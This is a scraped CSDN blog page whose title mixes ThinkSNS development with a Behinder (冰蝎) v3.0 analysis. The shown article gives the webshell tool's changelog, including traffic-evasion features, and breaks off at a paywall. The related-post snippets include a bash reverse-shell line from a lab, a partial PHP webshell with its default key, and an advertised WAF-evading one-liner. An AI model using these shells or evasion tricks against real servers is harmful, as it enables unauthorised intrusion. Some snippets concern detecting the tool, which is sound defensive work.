v3二次开发 基于php实战thinksns_冰蝎v3.0分析

最新推荐文章于 2024-04-18 21:20:28 发布
最新推荐文章于 2024-04-18 21:20:28 发布
阅读量600 收藏
点赞数
文章标签: v3二次开发 基于php实战thinksns
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_34963576/article/details/112293376
版权

冰蝎v3.0介绍

传统webshell管理工具“菜刀”的攻击流量特征明显,容易被检测设备拦截,攻击方迫切需求具有加密通信功能的webshell。由于流量加密,传统的WAF、IDS设备难以检测。因此,一款动态二进制加密网站管理客户端“冰蝎”应运而生,这给安全设备造成很大困扰。

冰蝎v3.0更新

冰蝎(Behinder)是一款Webshell管理工具。近期冰蝎进行了3.0版本的发布,新版本修改了旧版本的流量特征。

2020年8月16日,rebeyond发布冰蝎v3.0 Beta1:

  1. 取消动态密钥协商机制,采用预共享密钥(PSK),密钥格式为md5("admin")[0:16]

  2. 添加插件功能,可自定义扩展插件

  3. UI框架使用javafx替代awt

  4. 增强内网穿透功能,在原有的基于HTTP的socks5隧道基础上,增加单端口转发功能

2020年8月17日 ,发布冰蝎v3.0 Beta 2:

  1. 新增了jspx、asp版本服务端,修复了aspx服务端

  2. 新增双击打开功能

  3. 修复了路径中有中文导致“找不到数据文件”的问题

  4. 修复了文件管理UI重叠问题

  5. ”设置代理”新增Socks代理连接功能

2020年8月18日,发布冰蝎v3.0 Beta 3:

  1. 增加了端口映射功能的稳定性

  2. Java服务端支持Java6+

  3. 修复了PHP版本连接不上的问题,PHP版本支持为PHP5.3~PHP7.4

  4. 修复了aspx连接不上的问题

  5. 修复了asp版本无法连接的问题

  6. 请求体增加了随机冗余参数,避免防护设备通过请求体大小识别请求

  7. 更新了内置的UesrAgent列表

  8. 修复了请求体中cookie值携带cookie属性的问题

  9. 修该了Accept请求头

  10. 修复了某些环境下无法列目录的问题

  11. 修复了文件无法打开的问题

冰蝎v3.0特点

冰蝎目前最新版本为v3.0 Beta 3,兼容性已经日益完善,Java服务端支持Java6+&#

最低0.47元/天 解锁文章
三无 粉丝
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
渗透测试之冰蝎实战
大河之犬的博客
03-28 1638
冰蝎”是一款动态二进制加密网站管理客户端。
python与机械结合_python - 将RASA与Python和Flask结合使用的聊天机器人 - 堆栈内存溢出...
weixin_39737947的博客
11-26 185
我正在尝试使用RASA学习和创建聊天机器人,该聊天机器人必须将cmdline的输入传递给显示为Flask API的Python数据帧,并获取响应。所有零碎的部分都可以正常工作,但是当我缝合在一起时,无法将输入参数从RASA cmdline传递给Pandas。这是到目前为止我所做的总体摘要:创建了一个熊猫数据框,并将其公开为Flask API。能够手动点击它并在浏览器中查看输出。将Flask API...
【靶场】双重内网渗透测试场景_利用冰蝎搭建隧道,2024年最新手把手教你5G时代Webview的正确使用姿势
最新发布
2401_84253850的博客
04-18 904
bash -i >& /dev/tcp/公网ip/端口 0>&1。发现tomcat 的ip为192.168.20.1:8080。上传webshell:这里是tomcat弱密码漏洞。注意这种方式不稳定不怕麻烦使用frp代理。执行./frpc -c frpc.ini。网卡中有30网段:测试是否出网。
php冰蝎一句话,冰蝎3.0-分析系列 1-beta2-php
weixin_40000131的博客
04-05 350
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.163 Safari/535.1Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0) Gecko/20100101 Firefox/6.0Mozilla/5.0 (Windows NT ...
冰蝎php木马修改,冰蝎动态二进制加密WebShell的检测
weixin_42442958的博客
04-09 2505
中国菜刀等工具管理WebShell的时候会有一些固定的特征,容易被waf或者IPS检测到,最近1年出来了个动态加密的WebShell管理工具,给检测带来了一定的困难,所以写个文章简单解剖一下注:本文只针对当前的最新版冰蝎(Behinder) v2.0.1,以php webshell为例,其他webshell只是有细微的差别,有兴趣可以自行研究实验环境客户端: windows 7 + 冰蝎(Behi...
精简&明文免杀冰蝎php一句话.php
10-30
php一句话免杀绕过安全狗、D盾等WAF防护软件 可以轻松绕过 waf 的检测
ThinkSNS_V2.8_allinone
06-08
V2.8版本是该系统的一个重要里程碑,它基于PHP编程语言,利用了Laravel框架,这是一个高度模块化、组件化的开发环境,确保了系统的稳定性和可扩展性。同时,它采用了MySQL作为数据库管理系统,保证了数据处理的高效...
ThinkSNS_v4.6.1_开源版本_含全部技术资料
02-12
开发者可以通过阅读源码,了解系统架构,学习最佳实践,并进行二次开发。 2. **技术文档**:详尽的技术文档指导开发者如何快速上手,包括安装部署、API接口、数据库设计、模板制作等方面的说明。 3. **使用手册**...
ThinkSNS_V3.zip_thinksns
09-21
作为一款强大的社交软件系统,thinkSNS V3版本为开发者提供了丰富的功能和无限的二次开发可能性,使得快速构建类似微博的信息发布系统变得轻而易举。 首先,我们来了解一下thinkSNS的核心概念。thinkSNS是一款基于...
thinksns_myop_utility.php
06-24
thinksns_myop_utility.php
thinksns.zip_thinksns_thinksns+源码_thinksns源码
09-20
3. **源码分析**:下载的“thinksns.zip”文件包含了ThinkSNS的完整源代码,开发者可以深入了解系统的工作原理,对代码进行修改、调试或二次开发。源码中通常包括了前端界面、后端逻辑、数据库模型、API接口以及配置...
冰蝎工具的最新检测特征
securitypaper的博客
06-15 807
冰蝎是一个大佬写的类似原来菜刀的webshell管理工具,具体实现可以参考[rebeyond 在先知的](https://xz.aliyun.com/u/8697)的冰蝎实现文章,包括java、.net、php
【靶场】双重内网渗透测试场景
信安是不可或缺的一部分!
05-31 1594
使用vulfocus搭建一个内网场景靶场拓扑如下:入口有两个,一个是think PHP2.x命令执行和5x的命令执行漏洞,后续需要搭建二层隧道进行渗透测试。这个场景还是比较简单,如果目标不出网,也可以在tomcat上做frpserver服务,让他又当客户机又当服务器,同时还可通过msf做代理和上线cs做权限维持,下次使用这种方式做测试,试试效果如何。
网络安全工具冰蝎(behinder)3.0使用教程
SHELLCODE_8BIT的博客
09-13 3215
输入我们上传的地址,之后密码填写rebeyond。我的是java所以选择shell.jsp。将server中的文件上传。
冰蝎4-从入门魔改
zkaqlaoniao的博客
10-26 132
在每一次的渗透当中,都会遇见很多问题,比如一个工具需要java的一个低版本,另外一个又需要高版本,是可以在一个系统一个系统中存在多个java,但太麻烦,所以我就想在一个工具当中嵌入多个工具,套娃,然后增添一些功能方便各种操作,包括自定义成自己方便的类型,其次这是配合我上一篇文章可以结合使用的。
openssl 版本区别_冰蝎的前世今生:3.0新版本下的一些防护思考
weixin_39641103的博客
11-27 910
冰蝎Behinder)是国内黑客圈较火的一款Webshell管理工具。在今年HW开始前,冰蝎突然进行了3.0版本的发布,新版本修改了不少旧版本的流量特征,导致大量WAF、HIDS、Webshell检测工具失效。本文将详细揭秘冰蝎的前世今生,以及对于冰蝎相关攻击的检测思路和3.0新版本下的防护思考。冰蝎的前世在冰蝎这个工具出现以前,中国菜刀一直是国内的白帽子、黑帽子、各种帽子常用的Webshell...
Behinder_v3.0 Beta 7安装注意事项
weixin_44576411的博客
04-13 2550
下载地址 https://github.com/rebeyond/Behinder/releases/tag/Behinder_v3.0_Beta_7 注意解压目录,最好是新建文件夹 冰蝎运行环境是java8,如果自己的版本过高,如果是linux,就切换版本,如果windows,没事过,可以尝试一下 最后他不支持自带javafx,java1请自行下载,再装载 ...
冰蝎3 冰蝎2 behinder流量分析 流量解密
ShenZ的博客
08-30 3221
好多没找全,明天再找吧 冰蝎3 AES密钥为连接密码32位md5值的前16位,默认连接密码rebeyond。 webshell: php <?php @error_reporting(0); session_start(); $key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond $_SESSION['k']=$key; $post=file_get_contents("php://input"); if(!exten
冰蝎的安装和使用
weixin_51641247的博客
04-06 5185
相对于菜刀和蚁剑,冰蝎的特点是动态二进制加密实现新型一句话木马,它的数据是加密传输的,右键空白处新增,输入webshell信息,若使用冰蝎自带的webshell则默认密码为rebeyond冰蝎提供asp、c#、php、Java的自定义代码执行功能,文本框支持语法高亮,c#和Java会把输入的源代码自动编译并执行。
thinksns开源版
12-27
开源版提供了丰富的插件和模板,用户可以根据自己的需求进行二次开发定制。 除了社交功能外,thinkSNS还支持整合支付功能,方便用户进行打赏、付费阅读和商品交易。同时,thinkSNS还提供了丰富的统计分析功能,帮助...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值